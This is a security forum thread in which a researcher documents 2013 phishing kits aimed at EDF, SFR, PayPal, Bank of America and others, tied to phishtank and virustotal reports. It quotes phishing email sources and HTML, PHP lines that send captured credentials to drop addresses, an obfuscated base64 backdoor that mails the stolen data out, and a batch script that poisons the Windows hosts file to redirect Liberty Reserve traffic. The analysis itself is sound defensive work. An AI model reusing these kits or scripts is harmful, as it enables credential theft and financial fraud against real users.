KernelMode.info

[Xylitol]

EDF Phishing, html form attached to mail.
dzwasqw.com as domain like before.
https://www.virustotal.com/fr/file/ef81 ... 361036397/

Code: Select all

<form class="form" name ="darnoo" id="darnoo" method="post"  onsubmit="return verif_formulaire()" action="http://dzwasqw.com/news.php" enctype="application/x-www-form-urlencoded">

severals other crap also in attach

[Xylitol]

EDF: http://www.phishtank.com/phish_detail.p ... id=1744379
https://www.virustotal.com/fr/url/8d736 ... 361612707/

chichi.php:

Code: Select all

$send = "vbv.se2013@gmail.com,x-vbv2013@voila.fr"; 

Mail source:

Code: Select all

x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 114.141.201.34) smtp.mailfrom=me@localhost.com; dkim=none; x-hmca=none
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0xO1NDTD0z
X-Message-Info: aKlYzGSc+LlaTh0Akp53ufvjAZluO5efh5geSw0oo+GpwG77dvJXRPqaytLkxzNXtd7G5FAWnuN/bopfHx/hFziWrm/Jv8o5is8iMbh6Y9UdCAzEoOJpF6l+4GrbBO9+Q/s8V1o6DXQ7mP+21CIl1wWH5fzQ1JAD
Received: from mail.ozlocal.com.au ([114.141.201.34]) by COL0-MC2-F34.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
    Wed, 20 Feb 2013 13:18:06 -0800
Received: from 114-141-202-116 ([127.0.0.1])
        by mail.ozlocal.com.au (Merak 8.9.0-1) with SMTP id FXL32740
        for <**************@hotmail.fr>; Thu, 21 Feb 2013 08:17:40 +1100
Date: Thu, 21 Feb 2013 08:17:40 ¸1000
Subject: [Edf.FR] - Relance pour une facture impayee !
To: **************@hotmail.fr
From:  <Edf@ Mail.fr>
Reply-To:
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Return-Path: me@localhost.com
Message-ID: <COL0-MC2-F34Lsp5YB2001fd6b1@COL0-MC2-F34.Col0.hotmail.com>
X-OriginalArrivalTime: 20 Feb 2013 21:18:07.0101 (UTC) FILETIME=[C6E67AD0:01CE0FAF]

<span style="font-size:26px">Votre espace Client</span><br>
         <br>
         <strong style="font-size:12px">Cher client, chère cliente,</strong><br>
         <br>
         <span style="font-size:12px">Malheureusement, l'équipe Edf a constaté que votre dernière facture n'est pas encore payée. Nous vous invitons à régler vote situation en ligne pour éviter la pénalité du retard. Avec le lien suivant, vous pouvez régler votre facture :</span>
      <table height="153" width="569">
         <tbody>
            <tr>
               <td align="right" valign="top">
                   </td>
            </tr>
            <tr>
               <td colspan="2" style="font-size:12px;color:rgb(112,112,112);font-family:Arial,Helvetica,sans-serif" align="left">
                  <br>
                  <table bgcolor="#345ca3" border="0" cellpadding="15" cellspacing="0" width="570">
                     <tbody>
                        <tr>
                           <td style="color:rgb(255,255,255)" align="center">
                              <a href="http://www.sfhregistre.org/media/system/swf/Edf/" target="_blank"><font color="#ffffff" size="4">Régler votre facture </font><span style="color:rgb(255,255,255)"><span style="font-size:18px">Electronique N° J05022013</span></span> </a></td>
                        </tr>
                     </tbody>
                  </table>
               </td>
            </tr>
            <tr>
               <td colspan="2" style="font-size:12px;color:rgb(112,112,112);font-family:Arial,Helvetica,sans-serif" align="left">
                  <p>
                     <span style="display:inline!important;word-spacing:0px;font-family:arial,sans-serif;font-style:normal;font-variant:normal;font-weight:normal;font-size:13px;line-height:normal;font-size-adjust:none;font-stretch:normal;text-transform:none;color:rgb(34,34,34);text-indent:0px;white-space:normal;letter-spacing:normal"><font color="#737373">Nous vous rappelons qu’avec votre espace Client, vous bénéficiez 7j/7 et 24h/24 de nombreux avantages et services qui vous permettront de simplifier la gestion de vos contrats.</font></span><br>
                     <span style="display:inline!important;word-spacing:0px;font-family:arial,sans-serif;font-style:normal;font-variant:normal;font-weight:normal;font-size:13px;line-height:normal;font-size-adjust:none;font-stretch:normal;text-transform:none;color:rgb(34,34,34);text-indent:0px;white-space:normal;letter-spacing:normal"><font color="#737373">Cordialement,<br>
                     Conseiller EDF Bleu Ciel</font></span></p>
               </td>
            </tr>
         </tbody>
      </table>
      <table>
         <tbody>
            <tr>
               <td width="35">
                  <img border="0" height="1" width="1"></td>
            </tr>
         </tbody>
      </table>
      <table border="0" cellpadding="0" cellspacing="0" width="674">
         <tbody>
            <tr>
               <td width="61">
                   </td>
               <td style="font-size:10px;color:rgb(112,112,112);font-family:Arial,Helvetica,sans-serif" align="left">
                  <div>
                     Ce message vous est adressé automatiquement. Nous vous remercions de ne pas répondre, ni d'utiliser cette adresse email.<br>
                     ATTENTION : Ce message est strictement confidentiel. Son intégrité n'est pas assurée sur Internet. Si vous n'êtes pas destinataire du message, merci de le détruire.<br>
                     <br>
                     Copyright © EDF 2013</div>



[Xylitol]

Code: Select all

$to = "mehdiloveall@hotmail.fr"; 

http://www.phishtank.com/phish_detail.p ... id=1749068
https://www.virustotal.com/fr/url/16de6 ... 362037926/

[Xylitol]

redirector:
http://www.phishtank.com/phish_detail.p ... id=1751290
phishs:
http://www.phishtank.com/phish_detail.p ... id=1751315
http://www.phishtank.com/phish_detail.p ... id=1751304
http://www.phishtank.com/phish_detail.p ... id=1751292

Mail source:

Code: Select all

x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 82.98.167.163) smtp.mailfrom=service@sfr_mail.fr; dkim=none header.d=sfr_mail.fr; x-hmca=none
X-SID-PRA: service@sfr_mail.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: 12l2I64mAZSWFhQ0inhVxAVzsjGYsff35aXkapIX2Y6BZyPYPlOgB2x+8Zs0JUukQfjv9xb6BSycqMBDNxV0SdiqJZrh0t9KDyMvDPT1gQL4NVYW8z+yFT6SYxcLl2bzgiwNRBgGeKUkoooYSA2Rs+mY5cOQkwJN
Received: from vl403.dinaserver.com ([82.98.167.163]) by COL0-MC1-F18.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
    Fri, 1 Mar 2013 09:15:17 -0800
Received: by vl403.dinaserver.com (Postfix, from userid 30007)
   id BA54E19EB46; Fri,  1 Mar 2013 18:15:07 +0100 (CET)
To: *******************@hotmail.fr
Subject: PV: FA53-TNG12-UT9
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
From: Service Clients <service@sfr_mail.fr>
Message-Id: <20130301171507.BA54E19EB46@vl403.dinaserver.com>
Date: Fri,  1 Mar 2013 18:15:07 +0100 (CET)
X-DinaScanner-Information: DinaScanner. Filtro anti-Spam y anti-Virus
X-MailScanner-ID: BA54E19EB46.ECE92
X-DinaScanner: Libre de Virus
X-DinaScanner-SpamCheck: no es spam, SpamAssassin (almacenado, puntaje=2.819,
   requerido 6, BAYES_00 -2.60, HTML_MESSAGE 0.00,
   HTML_MIME_NO_HTML_TAG 0.10, MIME_HTML_ONLY 1.46, NO_RELAYS -0.00,
   SUBJ_ALL_CAPS 2.08, URIBL_PH_SURBL 1.79)
X-DinaScanner-SpamScore:  2.82
X-DinaScanner-From: service@sfr_mail.fr
X-Spam-Status: No
Return-Path: service@sfr_mail.fr
X-OriginalArrivalTime: 01 Mar 2013 17:15:18.0254 (UTC) FILETIME=[58E898E0:01CE16A0]


<br><dl style="display:none" class="allheaders"><dt class="fullHeader">Authentication-Results : </dt><dd>sfrmc.priv.atos.fr; dkim=none (no signature);<br>   dkim-adsp=none (no policy) header.from=service@box-sfr.fr</dd><br><dt class="fullHeader">Content-type : </dt><dd>text/html; charset=iso-8859-1</dd><br><dt class="fullHeader">Date : </dt><dd>Fri, 22 Feb 2013 17:23:42 -0800 (PST)</dd><br><dt class="fullHeader">From : </dt><dd>"[E-Fact] _1-06MS-4256" &lt;service@box-sfr.fr&gt;</dd><br><dt class="fullHeader">MIME-Version : </dt><dd>1.0</dd><br><dt class="fullHeader">Message-Id : </dt><dd>&lt;20130223012342.BFEE86BEC1ED@ve.kjk57hr6.vesrv.com&gt;</dd><br><dt class="fullHeader">Received : </dt><dd>by ve.kjk57hr6.vesrv.com (Postfix, from userid 33)<br>   id BFEE86BEC1ED; Fri, 22 Feb 2013 17:23:42 -0800 (PST)</dd><br><dt class="fullHeader">Received : </dt><dd>from filter.sfr.fr (localhost [64.207.153.29])<br>   by msfrf2419.sfr.fr (SMTP Server) with ESMTP id 928791C0009C<br>   for &lt;tl2
 000000000000000005422450@back10-mail02-02.sfrmc.priv.atos.fr&gt;; Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Received : </dt><dd>from msfrf2419.sfr.fr (msfrf2419 [10.18.29.33])<br>    by msfrb1004 (Cyrus v2.3.16) with LMTPA;<br>    Sat, 23 Feb 2013 13:20:55 +0100</dd><br><dt class="fullHeader">Received : </dt><dd>from ve.kjk57hr6.vesrv.com (unknown [64.207.153.29])<br>   by msfrf2419.sfr.fr (SMTP Server) with ESMTP   for &lt;miriam.griffin@sfr.fr&gt;;<br>   Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Received : </dt><dd>from ve.kjk57hr6.vesrv.com (unknown [64.207.153.29])<br>   by msfrf2419.sfr.fr (SMTP Server) with ESMTP id 854A11C00086<br>   for &lt;miriam.griffin@sfr.fr&gt;; Sat, 23 Feb 2013 13:20:55 +0100 (CET)</dd><br><dt class="fullHeader">Return-Path : </dt><dd>&lt;www-data@ve.kjk57hr6.vesrv.com&gt;</dd><br><dt class="fullHeader">Subject : </dt><dd>Notification de prelevements automatique</dd><br><dt class="fullHeader">To : </dt><d
 d>miriam.griffin@sfr.fr</dd><br><dt class="fullHeader">X-PHP-Originat
ing-Script : </dt><dd>33:salton.php(2) : eval()'d code</dd><br><dt class="fullHeader">X-SFR-UUID : </dt><dd>20130223122055431.6972B46DE@msfrf2419.sfr.fr</dd><br><dt class="fullHeader">X-Sieve : </dt><dd>CMU Sieve 2.3</dd><br><dt class="fullHeader">X-sfr-mailing : </dt><dd>LEGIT</dd><br><dt class="fullHeader">X-sfr-spam : </dt><dd>not-spam</dd><br><dt class="fullHeader">X-sfr-spamrating : </dt><dd>40.000000</dd><br></dl></dl></div></div><div class="attachments" dojoattachpoint="attachmentsDiv" style="display:none"><h3>Pièce(s) Jointe(s) :</h3><div class="attachmentsList"><ul dojoattachpoint="attachmentsNode"></ul></div></div><div dojoattachpoint="playerDivNode" style="display:none"></div></div><div class="overflowmails fullmail"><div style="display: none;" class="message_player"></div><div class="messageBody " id="message"><img src="http://www.burococon.nl/administrator/modules/aa11.png" alt="SFR" border="0">
<div></div>
                                                                              
        
               <table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td valign="top">
               <p style="BORDER-RIGHT: 0pt; PADDING-RIGHT: 0pt; BORDER-TOP: 0pt; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 12px; PADDING-BOTTOM: 0pt; MARGIN: 15px 0pt 0pt; BORDER-LEFT: 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 0pt; BORDER-BOTTOM: 0pt; FONT-FAMILY: Arial">Votre
   conseiller sfr</p>
               <p style="BORDER-RIGHT: 0pt; PADDING-RIGHT: 0pt; BORDER-TOP: 0pt; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 12px; PADDING-BOTTOM: 0pt; MARGIN: 15px 0pt 0pt; BORDER-LEFT: 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 0pt; BORDER-BOTTOM: 0pt; FONT-FAMILY: Arial">Cordialement,</p>
               <p style="PADDING-RIGHT: 0pt; BORDER-TOP: rgb(54,172,2) 2px dotted; PADDING-LEFT: 0pt; FONT-WEIGHT: normal; FONT-SIZE: 11px; PADDING-BOTTOM: 5px; MARGIN: 20px 0pt 0pt; WIDTH: 525px; COLOR: rgb(97,97,97); LINE-HEIGHT: 14px; PADDING-TOP: 5px; BORDER-BOTTOM: rgb(241,172,2) 2px dotted; FONT-FAMILY: Arial; TEXT-ALIGN: right">
   Votre Espace Client <a href="internet-marketing.web.id/wp-load.php" style="FONT-WEIGHT: bold; FONT-SIZE: 11px; COLOR: rgb(54,54,54); FONT-FAMILY: Arial; TEXT-DECORATION: underline" target="_blank">
   espace Client</a></p>
      <p><img src="http://www.burococon.nl/administrator/modules/aa22.png" alt="" border="0">










Notification de prelevements automatique
service@box-sfr.fr

sfr:

Code: Select all

<?php
$send="undomia.result@gmail.com,ayhamox0102030@gmail.com"; // will send the results at this address.     

skat:

Code: Select all

mail("undomia.result@gmail.com,ayhamox0102030@gmail.com", $subj, $msg); 

visa:

Code: Select all

mail("ayhamox0102030@gmail.com",$subj,$msg,$from);

Backdoors: viewtopic.php?f=16&t=2410&start=20#p18402

[Xylitol]

previous machine (saturdaymorninggarage.com) lead to another compromised server now (?!)
they run Joomla and phishings for SFR and free.fr
dump in attach as usual.
http://www.phishtank.com/phish_detail.p ... id=1751320
http://www.phishtank.com/phish_detail.p ... id=1751343

sfr:

Code: Select all

$ana = "rbati2012@gmail.com";

free:

Code: Select all

$from = "From: FREE REZULT<rbati2012@gmail.com>"; 

http://www.restfulwhois.com/v1/gobiernodecojedes.com

[Xylitol]

EDF phish on compromised joomla
redirector: http://www.phishtank.com/phish_detail.p ... id=1764375
phish: https://www.phishtank.com/phish_detail. ... id=1764377

Code: Select all

$send = "th3.joker@hotmail.fr";
$subject = "EDF : $ip";
$from = "From: Mr.HiTman<th3.joker@hotmail.fr>";

mail($send,$subject,$message,$from); 

[Xylitol]

Paypal
https://www.virustotal.com/fr/file/1379 ... 365322167/

Code: Select all

<form method="post" action="https://www.misehardre.com/test.php" class=" edit">

Code: Select all

----------------------------------------------------------
https://www.misehardre.com/test.php

POST /test.php HTTP/1.1
Host: www.misehardre.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 931
cmd=_flow&cid=&CONTEXT=X3-7SZn2ExXucINxlliZ_05NdFsrIIpaV9TcRYNLL_GiOwm9XgEZzWKQeV0&myAllTextSubmitID=&nav=0.5.2&SESSION=-oOJYfJOm7TVIu-q67PWMFUUkLWytiKoYt0ovcoPcryKfzLA982CdRdzD2i&dispatch=5885d80a13c0db1f8e263663d3faee8db2b24f7b84f1819343fd6c338b1d9d60&LastFlowDispatch=5885d80a13c0db1f8e263663d3faee8db2b24f7b84f1819343fd6c338b1d9d60&flag_from_account_summary=1&LastRapidsSession=-oOJYfJOm7TVIu-q67PWMFUUkLWytiKoYt0ovcoPcryKfzLA982CdRdzD2i&outdated_page_tmpl=p%2Fgen%2Ffailed-to-load&login_email=ptheisen.mn%40netzero.net&cc_brand=&firstname=&lastname=&dobd=&dobm=&doby=&mother=&credit_card_type=+&cc_country_code=IL&address_country_code=IL&address=&address1=&state=&city=&country=&zip=&Next=Next&auth=EPs7ROY-CA08N6uDAUV0a8FvMQrpogx68yPkSTOXYz9tq0j4suaVeGIPmxyRamzhDmNhIjJ-HsabddzW9rjvSNqt9vnWVtP03gmczIvUcP2jvfFvM4GcUZ3z6dAREs9k3fzPkJ1x7MzqLaAATDA-up94c5CFmZlc2hLFcN6NQBLrlUUH4DEKf1H8aR3PFpK-jtCwpRI1SmcI1hZ5&form_charset=UTF-8
HTTP/1.1 302 Moved Temporarily
Date: Sun, 07 Apr 2013 08:17:58 GMT
Server: Apache
Location: http://www.paypal.com/cgi-bin/webscr?cmd=_login-run
X-Powered-By: PleskLin
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
----------------------------------------------------------

https://www.virustotal.com/fr/url/644ef ... 365322482/

[Xylitol]

Sparkasse, Paypal, Bank Of America, phishing dumped from compromissed servers.
Thanks to markusg for the link.

Sparkasse:

Code: Select all

$myemail = "rbati2014@gmail.com"; //email hna      

Paypal:

Code: Select all

$send = array("tonijuve28@hotmail.com");

Bank Of America:

Code: Select all

$suck = "tonijuve10@inbox.com";

Something fun about the Bank Of America phishing is this backdoor:

Code: Select all

eval(gzinflate(base64_decode('bWFpbChtYWNob3lncmV5NUBnbWFpbC5jb20sJHN1YmplY3QsJHNwYW0sJGhlYWRlcnMpOw==')));

decoded:

Code: Select all

mail(machoygrey5@gmail.com,$subject,$spam,$headers);

Edit: Attached Gmail+Facebook phishing
https://www.phishtank.com/phish_detail. ... id=1795535
https://www.phishtank.com/phish_detail. ... id=1795536

edit 2: Attached liberty reserve phishing partially
https://www.phishtank.com/phish_detail. ... id=1795631

[Xylitol]

Code: Select all

$send = "u1i@hotmail.com";

Found on a compromised wordpress

[Xylitol]

Some visa html crap in attach

Code: Select all

<form method="post" action=http://appscape.co.uk/mail.php>  

And the guys of liberty reserve phishing have recently do a malz with a legit hacktool and a batch file, everything packaged as SFX obviously the batch file is executed first:

Code: Select all

@echo off
takeown /f "%windir%\system32\drivers\etc\hosts" && icacls "%windir%\system32\drivers\etc\hosts" /grant administrators:F
attrib -s -h -r %windir%\system32\drivers\etc\hosts
%windir%\notepad.exe %windir%\system32\drivers\etc\hosts
echo 69.195.86.234 libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 www.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 http://www.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 http://libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 http://sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 http://www.sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 https://www.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 https://libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 https://sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts
echo 69.195.86.234 https://www.sci.libertyreserve.com>>C:\Windows\System32\drivers\etc\hosts

l33t.
I got three of his ip 2.193.219.253, 2.193.242.123, 2.193.251.246 who look's like dsl customers/proxies...